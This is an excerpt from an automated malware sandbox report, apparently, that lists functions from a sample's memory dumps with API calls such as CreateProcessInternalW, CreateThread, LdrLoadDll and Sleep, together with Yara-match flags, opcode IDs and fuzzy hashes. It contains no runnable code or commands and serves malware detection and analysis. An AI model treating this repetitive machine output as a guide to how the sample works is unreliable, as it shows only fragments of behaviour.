                                                          • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                          • Instruction ID: 382acd7a4fab91cddc472346556d95fe4a93fc0839f526cb77600e8504ebdf4f
                                                          • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                          • Instruction Fuzzy Hash: 1FF015B2200208ABCB14DF89CC81EEB77ADAF88750F118148BE0897241CA30F810CBE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00CF82DA, Relevance: 1.5, APIs: 1, Instructions: 22nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtClose.NTDLL(00CF3D20,?,?,00CF3D20,00000000,FFFFFFFF), ref: 00CF8305
                                                          Memory Dump Source
                                                          • Source File: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, Offset: 00CE0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: 6a67c0b54e1ee0514e62fc4795a429ffb69ef19da6279782c4973618f2426967
                                                          • Instruction ID: b55302793b517171eebb0291c9d76daa8d9be0e7c050673f2137156994065a6f
                                                          • Opcode Fuzzy Hash: 6a67c0b54e1ee0514e62fc4795a429ffb69ef19da6279782c4973618f2426967
                                                          • Instruction Fuzzy Hash: 59E01276204214BFEB11DFA8CC45EE77B69EF54750F1545A9BA5D9B382C530E50087E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00CF82E0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • NtClose.NTDLL(00CF3D20,?,?,00CF3D20,00000000,FFFFFFFF), ref: 00CF8305
                                                          Memory Dump Source
                                                          • Source File: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, Offset: 00CE0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                          • Instruction ID: 8a539a8975148c451d3c9fd67faaba43a9bd08941ff8a06a73209597047d1a34
                                                          • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                          • Instruction Fuzzy Hash: 21D012752002146BDB10EF98CC45EE7775CEF44750F154455BA185B242C930F90086E0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 056F9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000010.00000002.632384852.0000000005690000.00000040.00000001.sdmp, Offset: 05690000, based on PE: true
                                                          • Associated: 00000010.00000002.632688436.00000000057AB000.00000040.00000001.sdmp Download File
                                                          • Associated: 00000010.00000002.632699169.00000000057AF000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 261daeb57961b1df093b12d7e3175fea3f0e58a22edaf6b29945e6580a80a69d
                                                          • Instruction ID: be8a59a96fe2e1b7b001caa8580b10336ee18d89c7818aecbd235a800a5a2919
                                                          • Opcode Fuzzy Hash: 261daeb57961b1df093b12d7e3175fea3f0e58a22edaf6b29945e6580a80a69d
                                                          • Instruction Fuzzy Hash: A9900265211100470115A599074450700D697E93A5391D031F1005554CD6A188617161
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 056F95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000010.00000002.632384852.0000000005690000.00000040.00000001.sdmp, Offset: 05690000, based on PE: true
                                                          • Associated: 00000010.00000002.632688436.00000000057AB000.00000040.00000001.sdmp Download File
                                                          • Associated: 00000010.00000002.632699169.00000000057AF000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 0b720e00832c887564124646102ff28cbca67723f9d467bb60aec6d4178ebc89
                                                          • Instruction ID: eb1a1393dc30f766eaba536638e835154a11822c2766415cbe0eafca9967429e
                                                          • Opcode Fuzzy Hash: 0b720e00832c887564124646102ff28cbca67723f9d467bb60aec6d4178ebc89
                                                          • Instruction Fuzzy Hash: FF9002A120210047411571994454617409A97F4255B91D031E1004594DC5A588917165
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 056F9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000010.00000002.632384852.0000000005690000.00000040.00000001.sdmp, Offset: 05690000, based on PE: true
                                                          • Associated: 00000010.00000002.632688436.00000000057AB000.00000040.00000001.sdmp Download File
                                                          • Associated: 00000010.00000002.632699169.00000000057AF000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 5784ff8650647a8274b92b4d1a121b1918fc2aa2f682dcab9055fb1e3ee79b3a
                                                          • Instruction ID: a62ba3811e84c721bcc90c64fad3e089af036721ec7b95bd58a34512b01c5f69
                                                          • Opcode Fuzzy Hash: 5784ff8650647a8274b92b4d1a121b1918fc2aa2f682dcab9055fb1e3ee79b3a
                                                          • Instruction Fuzzy Hash: CF90027120110446D11065D95448647009597F4355F91E021A5014559EC6E588917171
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 056F9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000010.00000002.632384852.0000000005690000.00000040.00000001.sdmp, Offset: 05690000, based on PE: true
                                                          • Associated: 00000010.00000002.632688436.00000000057AB000.00000040.00000001.sdmp Download File
                                                          • Associated: 00000010.00000002.632699169.00000000057AF000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 8e75ccd453a8bb7cca414251892404f1c01bf9201ea9976f516185fddce93052
                                                          • Instruction ID: 9106837ffef67c09ce58ccb483e672d1e2d616fc5501d93afe7aeef427d0b7f6
                                                          • Opcode Fuzzy Hash: 8e75ccd453a8bb7cca414251892404f1c01bf9201ea9976f516185fddce93052
                                                          • Instruction Fuzzy Hash: F690027131124446D12061998444707009597E5255F91D421A081455CD86D588917162
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 056F9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000010.00000002.632384852.0000000005690000.00000040.00000001.sdmp, Offset: 05690000, based on PE: true
                                                          • Associated: 00000010.00000002.632688436.00000000057AB000.00000040.00000001.sdmp Download File
                                                          • Associated: 00000010.00000002.632699169.00000000057AF000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 227fd941ac3525f8825474553b4afe59e749eed4094fda85a5a1878bdfe5fd71
                                                          • Instruction ID: 4a28532b7e7cd13cf4fff71b1a7ef9cdd8102a72a7a30a424e4e486502c168d2
                                                          • Opcode Fuzzy Hash: 227fd941ac3525f8825474553b4afe59e749eed4094fda85a5a1878bdfe5fd71
                                                          • Instruction Fuzzy Hash: 3690026921310046D1907199544860B009597E5256FD1E425A000555CCC99588697361
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 056F9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000010.00000002.632384852.0000000005690000.00000040.00000001.sdmp, Offset: 05690000, based on PE: true
                                                          • Associated: 00000010.00000002.632688436.00000000057AB000.00000040.00000001.sdmp Download File
                                                          • Associated: 00000010.00000002.632699169.00000000057AF000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 409efcc592169ced155bafb0a81785ea848f3c2171e0ea30a8054e06dac271ec
                                                          • Instruction ID: dc449853201af705a343d1f15cfe311396e6091fa3a5e2be10268835dbeef1a4
                                                          • Opcode Fuzzy Hash: 409efcc592169ced155bafb0a81785ea848f3c2171e0ea30a8054e06dac271ec
                                                          • Instruction Fuzzy Hash: A790027120110846D1907199444464B009597E5355FD1D025A0015658DCA958A5977E1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 056F9650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000010.00000002.632384852.0000000005690000.00000040.00000001.sdmp, Offset: 05690000, based on PE: true
                                                          • Associated: 00000010.00000002.632688436.00000000057AB000.00000040.00000001.sdmp Download File
                                                          • Associated: 00000010.00000002.632699169.00000000057AF000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: d764685c9df16124d94d7750b6308c29800f321a34563db3aaa85ad760b50d90
                                                          • Instruction ID: bec4e9901cda80b67c1730492ef0199279e156c28cd10b7ce049e8cbc6f57164
                                                          • Opcode Fuzzy Hash: d764685c9df16124d94d7750b6308c29800f321a34563db3aaa85ad760b50d90
                                                          • Instruction Fuzzy Hash: 3090027120514886D15071994444A4700A597E4359F91D021A0054698D96A58D55B6A1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 056F96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000010.00000002.632384852.0000000005690000.00000040.00000001.sdmp, Offset: 05690000, based on PE: true
                                                          • Associated: 00000010.00000002.632688436.00000000057AB000.00000040.00000001.sdmp Download File
                                                          • Associated: 00000010.00000002.632699169.00000000057AF000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: d7c6ba832e87b4310630050db84bdc8566fda5e3430811bcdcf33a0aa7725070
                                                          • Instruction ID: 939d0d937f49f39516fa99df934c774c5eb107632d52e2414f0afbcd9274fa7c
                                                          • Opcode Fuzzy Hash: d7c6ba832e87b4310630050db84bdc8566fda5e3430811bcdcf33a0aa7725070
                                                          • Instruction Fuzzy Hash: 2290027120118846D1206199844474B009597E4355F95D421A441465CD86D588917161
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 056F96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000010.00000002.632384852.0000000005690000.00000040.00000001.sdmp, Offset: 05690000, based on PE: true
                                                          • Associated: 00000010.00000002.632688436.00000000057AB000.00000040.00000001.sdmp Download File
                                                          • Associated: 00000010.00000002.632699169.00000000057AF000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 04eca638b843dd891fb80ce8ac553e0db046c9e7f91ef7673922aa9cf05efcca
                                                          • Instruction ID: 72791943d88afa140c255b127e3c3444fc57fa23934b83fb8a9221d80a49ffcf
                                                          • Opcode Fuzzy Hash: 04eca638b843dd891fb80ce8ac553e0db046c9e7f91ef7673922aa9cf05efcca
                                                          • Instruction Fuzzy Hash: 0490027120110886D11061994444B47009597F4355F91D026A0114658D8695C8517561
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 056F9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000010.00000002.632384852.0000000005690000.00000040.00000001.sdmp, Offset: 05690000, based on PE: true
                                                          • Associated: 00000010.00000002.632688436.00000000057AB000.00000040.00000001.sdmp Download File
                                                          • Associated: 00000010.00000002.632699169.00000000057AF000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 697ec16af7b70eb777486f067686bb91ae221541a9547334b66dd6c45a758e54
                                                          • Instruction ID: 9c5e4b4a2f1f99a29c28a0b7a4352d2f9186c795959255fa0994f8b0524afced
                                                          • Opcode Fuzzy Hash: 697ec16af7b70eb777486f067686bb91ae221541a9547334b66dd6c45a758e54
                                                          • Instruction Fuzzy Hash: DD9002B120110446D15071994444747009597E4355F91D021A5054558E86D98DD576A5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 056F99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000010.00000002.632384852.0000000005690000.00000040.00000001.sdmp, Offset: 05690000, based on PE: true
                                                          • Associated: 00000010.00000002.632688436.00000000057AB000.00000040.00000001.sdmp Download File
                                                          • Associated: 00000010.00000002.632699169.00000000057AF000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 748ae18e9ab96f77667acd9aec969bc2f0b07b535d7a131bde4cba91c7cd1799
                                                          • Instruction ID: 3f161c44f4c2a3d37770a6f639ba4ad275178aa5a6ac397bfdf192c640d4838d
                                                          • Opcode Fuzzy Hash: 748ae18e9ab96f77667acd9aec969bc2f0b07b535d7a131bde4cba91c7cd1799
                                                          • Instruction Fuzzy Hash: 0D9002A134110486D11061994454B070095D7F5355F91D025E1054558D8699CC527166
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 056F9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000010.00000002.632384852.0000000005690000.00000040.00000001.sdmp, Offset: 05690000, based on PE: true
                                                          • Associated: 00000010.00000002.632688436.00000000057AB000.00000040.00000001.sdmp Download File
                                                          • Associated: 00000010.00000002.632699169.00000000057AF000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 10422435b9497109e0c1e209a1004f893b41298111c82f82fa24080973e32332
                                                          • Instruction ID: 48f2a3b97ad4771648013e9faf59ee8b6f91552dac2c42886aa845a3da526c3b
                                                          • Opcode Fuzzy Hash: 10422435b9497109e0c1e209a1004f893b41298111c82f82fa24080973e32332
                                                          • Instruction Fuzzy Hash: 5190027120110457D12161994544707009997E4295FD1D422A041455CD96D68952B161
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 056F9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000010.00000002.632384852.0000000005690000.00000040.00000001.sdmp, Offset: 05690000, based on PE: true
                                                          • Associated: 00000010.00000002.632688436.00000000057AB000.00000040.00000001.sdmp Download File
                                                          • Associated: 00000010.00000002.632699169.00000000057AF000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: 8ec330d5fd1f3ff9f9d3450279c07c1ecafbcf37952bf64c6c5b484581e13bc8
                                                          • Instruction ID: f82e504eb0f52d3d655145b7cdf5d75279a8fe51e272cbf5b85dfdd595c1e0b4
                                                          • Opcode Fuzzy Hash: 8ec330d5fd1f3ff9f9d3450279c07c1ecafbcf37952bf64c6c5b484581e13bc8
                                                          • Instruction Fuzzy Hash: EA900261242141965555B19944445074096A7F42957D1D022A1404954C85A69856F661
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 056F9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000010.00000002.632384852.0000000005690000.00000040.00000001.sdmp, Offset: 05690000, based on PE: true
                                                          • Associated: 00000010.00000002.632688436.00000000057AB000.00000040.00000001.sdmp Download File
                                                          • Associated: 00000010.00000002.632699169.00000000057AF000.00000040.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: InitializeThunk
                                                          • String ID:
                                                          • API String ID: 2994545307-0
                                                          • Opcode ID: e98cef87fc2d89b539b3af3a7fb58da167145b8f1eb967809c756077d8438123
                                                          • Instruction ID: 26bb8bdcebb8bb570d83401f1939e827a99e21c69047489b08c48d8a12ac0791
                                                          • Opcode Fuzzy Hash: e98cef87fc2d89b539b3af3a7fb58da167145b8f1eb967809c756077d8438123
                                                          • Instruction Fuzzy Hash: 3490026121190086D21065A94C54B07009597E4357F91D125A0144558CC99588617561
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00CF6ED0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Sleep.KERNELBASE(000007D0), ref: 00CF6F78
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, Offset: 00CE0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID: net.dll$wininet.dll
                                                          • API String ID: 3472027048-1269752229
                                                          • Opcode ID: 6a92b7a99dc5cf3c120e0dd34a87981038bb168d624f8961b1c3b790a82d205f
                                                          • Instruction ID: b5f3a8cfecc888def3234baaa02c22cd113089fc0c52c2c804028f4f626c4864
                                                          • Opcode Fuzzy Hash: 6a92b7a99dc5cf3c120e0dd34a87981038bb168d624f8961b1c3b790a82d205f
                                                          • Instruction Fuzzy Hash: B53170B5601708BBC765DFA9D8A1FA7B7B8EF48700F00841DF65A9B241D730B945CBA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00CF6EC8, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 82sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Sleep.KERNELBASE(000007D0), ref: 00CF6F78
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, Offset: 00CE0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID: net.dll$wininet.dll
                                                          • API String ID: 3472027048-1269752229
                                                          • Opcode ID: a8e54ce1e5586416c03d2eebe19df08fe03db50ed64e7eb0eaad64951c919647
                                                          • Instruction ID: e24a16573b71c545c3d6f4dfd23188dfaca4268e1e5ca61b7c69e7e533a01faf
                                                          • Opcode Fuzzy Hash: a8e54ce1e5586416c03d2eebe19df08fe03db50ed64e7eb0eaad64951c919647
                                                          • Instruction Fuzzy Hash: 4821A2B1A01308BBC750DFA9D8A1FA6B7B8EF48700F10801DF61D9B241D370A945CBA6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00CF84B3, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 27memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00CE3B93), ref: 00CF84ED
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, Offset: 00CE0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID: .z`
                                                          • API String ID: 3298025750-1441809116
                                                          • Opcode ID: 2b4c8e2a8772384ed7b38fe69d2613229ebcacfbb77181dfd7f3f3bf0ba928e6
                                                          • Instruction ID: a8100055c822ef09938533632bd0cd56100d3dd2fee0429289d62ce6bb6c3bae
                                                          • Opcode Fuzzy Hash: 2b4c8e2a8772384ed7b38fe69d2613229ebcacfbb77181dfd7f3f3bf0ba928e6
                                                          • Instruction Fuzzy Hash: 02E039B2200204AFCB14DF59CC48EA777ACEF84710F018555FA0957241C630ED10CBF0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00CF84C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00CE3B93), ref: 00CF84ED
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, Offset: 00CE0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID: .z`
                                                          • API String ID: 3298025750-1441809116
                                                          • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                          • Instruction ID: c178b86e48f45ed90ca8d7aa26e20d6ef51cbe66d0e248181015dd4ae799aa7c
                                                          • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                          • Instruction Fuzzy Hash: 66E01AB12002086BDB14DF59CC45EA777ACAF88750F014554BA0857241CA30E9148AF0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00CE7260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00CE72BA
                                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00CE72DB
                                                          Memory Dump Source
                                                          • Source File: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, Offset: 00CE0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID:
                                                          • API String ID: 1836367815-0
                                                          • Opcode ID: 69484e3783eb8d9c01b11df322e2eb6fb39cdd6ef4a8c58721d1981e421daacd
                                                          • Instruction ID: c9ea4a1a412829147ad6b4c7ed5156f64570fcfe4d4dc68624f963c32f1dbc77
                                                          • Opcode Fuzzy Hash: 69484e3783eb8d9c01b11df322e2eb6fb39cdd6ef4a8c58721d1981e421daacd
                                                          • Instruction Fuzzy Hash: 2601A771E8036877EB20A6959C03FFE776C9B00B50F150115FF04BA1C2E6A46A0646F6
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00CE72E3, Relevance: 3.0, APIs: 2, Instructions: 30threadwindowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 00CE72BA
                                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 00CE72DB
                                                          Memory Dump Source
                                                          • Source File: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, Offset: 00CE0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID:
                                                          • API String ID: 1836367815-0
                                                          • Opcode ID: 73abd346deb47186d547a36935545e6c166a6816c7a799c3452eb881c29c2374
                                                          • Instruction ID: d09961ceca6f128b8cd8b3aa64ffa62124afb04102aef0da87f92f84698b1c1d
                                                          • Opcode Fuzzy Hash: 73abd346deb47186d547a36935545e6c166a6816c7a799c3452eb881c29c2374
                                                          • Instruction Fuzzy Hash: 51E02620388295B4EE22A6615C83FFE7A18D741F41F10026EFF80E80C2EAC1150A57F2
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00CE9B10, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00CE9B82
                                                          Memory Dump Source
                                                          • Source File: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, Offset: 00CE0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0
                                                          • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                          • Instruction ID: afdda947a46d5d692ea063c986632ad1597da29a084b03949e516fcc714beab9
                                                          • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                          • Instruction Fuzzy Hash: 47011EB5E4020DABDF10EBE5EC42FADB3789B54308F008195EA1897241F671EB54DB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00CF8530, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00CF8584
                                                          Memory Dump Source
                                                          • Source File: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, Offset: 00CE0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateInternalProcess
                                                          • String ID:
                                                          • API String ID: 2186235152-0
                                                          • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                          • Instruction ID: 2d6494912e95f814ad627f88818f3a36d71ae0f205a66dff1e7cccbb52d3e3e9
                                                          • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                          • Instruction Fuzzy Hash: 4101AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97241CA30E851CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00CF84F9, Relevance: 1.5, APIs: 1, Instructions: 41memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00CF3506,?,00CF3C7F,00CF3C7F,?,00CF3506,?,?,?,?,?,00000000,00000000,?), ref: 00CF84AD
                                                          Memory Dump Source
                                                          • Source File: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, Offset: 00CE0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: 6bad959abed9f03ec0aea72578b1bca7e6ba64cc73e31b7f29dd7ec931920dce
                                                          • Instruction ID: b6a70f7838090dc315dfa81ddc3f4a7e7b49c691d9f9f3e4f34f9cac36fe12a5
                                                          • Opcode Fuzzy Hash: 6bad959abed9f03ec0aea72578b1bca7e6ba64cc73e31b7f29dd7ec931920dce
                                                          • Instruction Fuzzy Hash: B8F0C2752042446FDB20DFA8DC81EEB7BA8EF94314F20815AF91897742D631D914CBE1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00CF7000, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00CECCC0,?,?), ref: 00CF703C
                                                          Memory Dump Source
                                                          • Source File: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, Offset: 00CE0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread
                                                          • String ID:
                                                          • API String ID: 2422867632-0
                                                          • Opcode ID: 5319e438e28debab83a6866ef4e5a278427ec8cc33260fca04ff363afb244d49
                                                          • Instruction ID: 102dc2f2528fb68d0fb814743da549e01d42e471ff3c060a1fb67fe1acfc9e5b
                                                          • Opcode Fuzzy Hash: 5319e438e28debab83a6866ef4e5a278427ec8cc33260fca04ff363afb244d49
                                                          • Instruction Fuzzy Hash: 8EE06D733802083AE3306599AC03FA7B69C8F81B20F550026FB0DEA2C1D995F90142A9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00CF6FFB, Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,00CECCC0,?,?), ref: 00CF703C
                                                          Memory Dump Source
                                                          • Source File: 00000010.00000002.630996748.0000000000CE0000.00000040.00000001.sdmp, Offset: 00CE0000, based on PE: false
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateThread
                                                          • String ID:
                                                          • API String ID: 2422867632-0
                                                          • Opcode ID: 6d878d73583720309ed3bafb8ad71c4d546d03815dcaeb7576f4068e29d2a36d
                                                          • Instruction ID: a32881ca50fe4ae64b76e39acb90b1130e8ed3611c1ca4456f210b456028d47d
                                                          • Opcode Fuzzy Hash: 6d878d73583720309ed3bafb8ad71c4d546d03815dcaeb7576f4068e29d2a36d
                                                          • Instruction Fuzzy Hash: EBF092727807147AD370AA989C03FF7779C8F95B10F15012AFB49EB2C1D6A5F90146E6
                                                          Uniqueness

